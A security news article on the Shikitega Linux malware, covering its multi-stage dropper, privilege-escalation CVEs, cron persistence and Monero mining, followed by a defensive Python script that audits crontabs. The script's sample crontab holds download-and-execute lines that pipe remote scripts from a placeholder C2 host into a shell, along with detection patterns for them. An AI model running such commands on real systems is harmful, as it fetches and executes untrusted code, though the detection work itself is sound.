Researchers at AT&T Alien Labs have discovered a new Linux malware known as Shikitega. The malware targets computers and IoT devices and exploits vulnerabilities in the Linux system to elevate privileges, add persistence and launch a crypto miner on the target system.
The malware uses a polymorphic encoder to evade detection by making static, signature-based detection virtually impossible. Furthermore, it downloads and executes Metasploit’s “Mettle” meterpreter to maximise control over infected devices and abuses legitimate cloud services to store its command and control servers.
Metasploit is a popular penetration testing suite often found bundled with specialised operating systems like Kali Linux. Its uses often include creating malicious payloads for pretty much everything under the sun, including Linux devices and Android phones.
A layered infection chain
According to the researchers, Shikitega uses a multi-layer infection chain. The first stage contains only a few hundred bytes and is divided into modules, each responsible for a specific task: downloading and executing the Metasploit meterpreter, exploiting Linux vulnerabilities (CVE-2021-4034 and CVE-2021-3493) to escalate privileges, setting persistence on the infected machine using Cron and finally downloading and executing a crypto miner.
The main dropper is a small ELF file about 370 bytes in size; the actual code is even smaller, coming in at around 300 bytes. The malware derives its name from the “Shikata Ga Nai” polymorphic XOR additive feedback encoder, which allows it to run in looped stages, each loop decoding the next stage until the final payload is decoded and executed.
Once execution is complete, the C&C server kicks in with additional shell commands to execute on the target machine. This involves downloading additional files from the server that are executed from memory only. These files aren’t saved on the hard drive, further minimising the chances of detection.
As for persistence, the malware downloads and executes five different shell scripts and persists in the system by setting four crontabs — two for the currently logged-in user and two for the root user. The malware even checks whether or not the crontab command exists on the system before installing the malicious cron services. Additionally, to ensure that only one instance of the malware runs at any given time, it uses flock with a lock file.
Finally, the malware downloads and executes the XMRig miner (version 6.17.0), a popular miner for Monero. It also sets an additional crontab to download and execute the crypto miner from the C&C server.
The researchers recommend keeping software up to date, having antivirus or EDR installed on all endpoints and using a backup system to back up server files. That said, the malware is still expected to be a major headache for some time.
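As an added example (not code from the AT&T Alien Labs report), the following Python script audits crontab text for the persistence traits described in the two paragraphs above: scheduled download-and-execute commands, commands run from temporary or memory-backed paths, and single-instance locking via flock. The sample crontab and the C2 hostname are constructed placeholders, and the patterns are heuristics for triage rather than signatures.

```python
"""Flag crontab entries that show Shikitega-style persistence traits."""
import re
from typing import Dict, List

# Constructed sample crontab (placeholder hostname, not a real indicator);
# the first active entry is benign and must not be flagged.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://c2-placeholder.example/a.sh | sh
* * * * * flock -n /tmp/.x.lock /tmp/.x/run.sh
@reboot wget -qO- http://c2-placeholder.example/m > /dev/shm/m && sh /dev/shm/m
"""

# (indicator name, regex); each regex is a heuristic, not a signature.
INDICATORS = [
    ("download_and_execute",
     re.compile(r"\b(curl|wget)\b.*(\|\s*(ba)?sh\b|&&\s*(ba)?sh\b|\bsh\s+/)")),
    ("runs_from_tmp_or_memory",
     re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/\S*")),
    ("flock_lock_file",
     re.compile(r"\bflock\b\s+(-\w+\s+)*\S*\.?lock")),
]

def parse_crontab(text: str) -> List[str]:
    """Return the command part of each active cron line.
    Comments, blank lines and VAR=value settings are skipped."""
    cmds = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        # "@reboot cmd" has one schedule field, otherwise five fields precede the command
        fields = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        if len(fields) == (2 if line.startswith("@") else 6):
            cmds.append(fields[-1])
    return cmds

def flag_entries(text: str) -> Dict[str, List[str]]:
    """Map each suspicious command to the indicator names it triggered."""
    hits: Dict[str, List[str]] = {}
    for cmd in parse_crontab(text):
        names = [name for name, rx in INDICATORS if rx.search(cmd)]
        if names:
            hits[cmd] = names
    return hits

if __name__ == "__main__":
    for cmd, names in flag_entries(SAMPLE_CRONTAB).items():
        print(f"{', '.join(names):45s} {cmd}")
```

On a live host the same function can be fed the output of `crontab -l` for each user (root included) and the contents of the /etc/cron.* directories.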